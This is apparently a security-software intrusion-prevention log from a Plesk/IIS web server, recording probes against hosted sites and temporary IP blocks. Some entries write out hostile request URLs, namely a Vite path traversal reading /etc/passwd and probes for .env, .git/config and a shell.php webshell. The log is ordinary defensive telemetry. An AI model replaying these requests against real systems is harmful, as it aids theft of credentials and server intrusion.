000003a2	01dc947dc8d13536	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc947da46e25b8	01dc947da46e25b8	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE0NkRCNEUzLTk0N0QtMTFGMS1CMDQ4LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000b244	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://binhkhanhsteel.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000384	01dc947e4dd23c49	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc947e26e93e35	01dc947e26e93e35	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjI2RTYxN0Y4LTk0N0UtMTFGMS04NkZELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	000058fd	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://nonviet.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b2	01dc947e8d02227a	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc947e674b2982	01dc947e674b2982	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY3NEFBOEE4LTk0N0UtMTFGMS1BM0ZFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d1f2	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://new.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039b	01dc947fcf6ed294	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc947fab1e6f5f	01dc947fab1e6f5f	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFCMUMwQzJCLTk0N0YtMTFGMS05QkNELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000e2c6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://vlvn-co.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b4	01dc948082e6ee4a	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc94805ebcac42	01dc94805ebcac42	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjVFQjk3NUQzLTk0ODAtMTFGMS05NzIzLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000a655	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://khangviet.net/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000212	01dc94826b867652	000000cf	00000007	164a8367	6bf89c2d	00000001	00000000	00000001	01dc9482694317eb	01dc9483cee3d3eb	00000001	00000000	The client will block traffic from IP address 45.156.248.107 for the next 600 seconds (from 2/3/2026 3:27:54 AM to 2/3/2026 3:37:54 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b4	01dc94828cbc2457	000000ce	0000000f	164a8367	6bf89c2d	00000002	00000002	00000001	01dc9482673683d0	01dc9482673683d0	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY3MzE3OTQ4LTk0ODItMTFGMS1CMTZGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000475b	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://103.131.74.22/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000396	01dc948290141431	000000ce	00000003	164a8367	6bf89c2d	00000002	00000001	00000001	01dc94826934c99d	01dc94826934c99d	00000001	00000118	[SID: 33006] Web Attack: androxgh0st Scan Attempt attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY5MzQ0OTFDLTk0ODItMTFGMS1CMDQ3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMwMDYsIm5hbWUiOiJXZWIgQXR0YWNrOiBhbmRyb3hnaDBzdCBTY2FuIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000080ee	00010000	00000002	00000002	00004cd5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: androxgh0st Scan Attempt	http://103.131.74.22/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000038e	01dc948290141431	000000ce	00000003	164a8367	6bf89c2d	00000002	00000001	00000001	01dc94826939a3d0	01dc94826939a3d0	00000001	00000114	[SID: 30186] Web Attack: Malicious Scan Request attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjY5MzQ0OTFCLTk0ODItMTFGMS1CMDQ3LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzAxODYsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgU2NhbiBSZXF1ZXN0Iiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000075ea	00010009	00000002	00000002	00004cd5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Scan Request	http://103.131.74.22/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc9483225d3537	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc948320104a3d	01dc948485b1063d	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 3:33:01 AM to 2/3/2026 3:43:01 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc948346f22a46	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94831fe09ac6	01dc94831fe09ac6	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjE5MDAsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwNjIyMTg2MzEsInVpZCI6IkNCNzBCMTMzLTAwNzAtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoyfSwiZGV0ZWN0aW9uX3VpZCI6IjFGREUwODE5LTk0ODMtMTFGMS1BQ0U0LTAwMTU1RDA1NzgwQyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxTeXNXT1c2NFxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwic3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcIiAtdiBcInYyLjBcIiAtbCBcIndlYmVuZ2luZTQuZGxsXCIgLWEgXFxcXC5cXHBpcGVcXGlpc2lwbTA2NjE3YzE3LTA1YWItNDU4MS1hODEwLTRiZjZlOWI5YjMyYiAtaCBcIkM6XFxpbmV0cHViXFx0ZW1wXFxhcHBwb29sc1xcc3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCA1IC10YSAwIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNjIwNDYxNzYyMTkxLCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXCIsIm1kNSI6IjNEMjcyNTc0RjM3OEJBMDZGRDJCODVDQjc3OUMwM0FBIiwibmFtZSI6Inczd3AuZXhlIiwicGF0aCI6ImM6XFx3aW5kb3dzXFxzeXN3b3c2NFxcaW5ldHNydlxcdzN3cC5leGUiLCJwcm9kdWN0X25hbWUiOiJJbnRlcm5ldCBJbmZvcm1hdGlvbiBTZXJ2aWNlcyIsInNoYTEiOiIxOTE3RjY5RUQyNjBFNTEzMTAxNUY5QTVENzIxMUFGNzBGMEVBNTNCIiwic2hhMiI6IkE0RTFBNUIxNDg5QjMxNjA2NEYwODNDNENEN0JGQzgzQjcwRUU0Njg0QTREOTdEMUFEMUM0RTZENjQ4MTYxQTMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc0ODM1ODU0MDAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4xIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjMwNzE2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDQzNDMxNDE5LCJ1aWQiOiIwNDY4MkFCNS0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMTkwOCwibmFtZSI6IldlYiBBdHRhY2s6IEpTQ29pbm1pbmVyIERvd25sb2FkIDEwOCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000e4ea	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770064376.6770310401916503906250			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000212	01dc94836ed15ed2	000000cf	00000007	164a8367	ced22c8e	00000001	00000000	00000001	01dc94836e23525a	01dc9484d3c40e5a	00000001	00000000	The client will block traffic from IP address 142.44.210.206 for the next 600 seconds (from 2/3/2026 3:35:12 AM to 2/3/2026 3:45:12 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b2	01dc9483935afe44	000000ce	0000000f	164a8367	ced22c8e	00000002	00000002	00000001	01dc94836d3021a8	01dc94836d3021a8	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZEMkQ5QkE3LTk0ODMtMTFGMS04RjUxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000c02e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://acsv.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000394	01dc9483935afe44	000000ce	00000003	164a8367	ced22c8e	00000002	00000001	00000001	01dc94836de7b77b	01dc94836de7b77b	00000001	00000118	[SID: 33006] Web Attack: androxgh0st Scan Attempt attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZERTc4NkY0LTk0ODMtMTFGMS04RjlGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMwMDYsIm5hbWUiOiJXZWIgQXR0YWNrOiBhbmRyb3hnaDBzdCBTY2FuIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000080ee	00010000	00000002	00000002	0000c03a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: androxgh0st Scan Attempt	http://acsv.com.vn/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000216	01dc9483f3bbf4e9	000000d3	0000000f	164a8367	6bf89c2d	00000001	00000000	00000000	01dc9483cf90464a	01dc9483cf90464a	00000001	00000000	Active Response that started at 2/3/2026 3:27:54 AM is disengaged. The traffic from IP address 45.156.248.107 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000212	01dc94847bfc5643	000000cf	00000007	164a8367	ed3bc176	00000001	00000000	00000001	01dc9484796f0fed	01dc9485df0fcbed	00000001	00000000	The client will block traffic from IP address 118.193.59.237 for the next 600 seconds (from 2/3/2026 3:42:40 AM to 2/3/2026 3:52:40 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000039c	01dc94849d36d034	000000ce	0000000f	164a8367	f70a942d	00000002	00000002	00000001	01dc948478d4169f	01dc948478d4169f	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc4RDNFNjE1LTk0ODQtMTFGMS05RjkzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000fde0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://saomaiit.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000043f	01dc94849d36d034	000000ce	0000000f	164a8367	ed3bc176	00000002	00000002	00000001	01dc948479193b71	01dc948479193b71	00000001	0000016c	[SID: 34140] Audit: Minio Information Disclosure In Cluster Deployment CVE-2023-28432 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc5MTYxNjk3LTk0ODQtMTFGMS05RkFGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjMtMjg0MzIiLCJpZCI6MzQxNDAsIm5hbWUiOiJBdWRpdDogTWluaW8gSW5mb3JtYXRpb24gRGlzY2xvc3VyZSBJbiBDbHVzdGVyIERlcGxveW1lbnQgQ1ZFLTIwMjMtMjg0MzIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		0000855c	00010000	00000002	00000002	0000edae	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Minio Information Disclosure In Cluster Deployment CVE-2023-28432	http://103.131.74.22/minio/bootstrap/v1/verify			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c3	01dc94849d36d034	000000ce	00000003	164a8367	ed3bc176	00000002	00000001	00000001	01dc94847935d791	01dc94847935d791	00000001	00000134	[SID: 35059] Web Attack: Vite CVE-2025-30208 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc5MzJBMUNFLTk0ODQtMTFGMS05RkJCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtMzAyMDgiLCJpZCI6MzUwNTksIm5hbWUiOiJXZWIgQXR0YWNrOiBWaXRlIENWRS0yMDI1LTMwMjA4Iiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000088f3	00010000	00000002	00000002	0000ee1c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Vite CVE-2025-30208	http://103.131.74.22/@fs/etc/passwd?import&raw??			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc9484aa7dce68	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc9484865aa16f	01dc9484865aa16f	00000001	00000000	Active Response that started at 2/3/2026 3:33:01 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000216	01dc9484fa4be0ef	000000d3	0000000f	164a8367	ced22c8e	00000001	00000000	00000000	01dc9484d3c4c9e3	01dc9484d3c4c9e3	00000001	00000000	Active Response that started at 2/3/2026 3:35:12 AM is disengaged. The traffic from IP address 142.44.210.206 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc9485e2f2e347	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc9485e07fd56c	01dc94874620916c	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/3/2026 3:52:43 AM to 2/3/2026 4:02:43 AM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000216	01dc9486043331eb	000000d3	0000000f	164a8367	ed3bc176	00000001	00000000	00000000	01dc9485df10a99e	01dc9485df10a99e	00000001	00000000	Active Response that started at 2/3/2026 3:42:40 AM is disengaged. The traffic from IP address 118.193.59.237 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000da9	01dc94860ad5b684	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9485e0287bad	01dc9485e6f5a5bd	00000002	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjI1OTk2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDY1NDkyODQ2LCJ1aWQiOiI5RjI2M0M1Qi0wMDc4LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJFNkYzMTJDNy05NDg1LTExRjEtQjkyMi0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG0wNjYxN2MxNy0wNWFiLTQ1ODEtYTgxMC00YmY2ZTliOWIzMmIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdH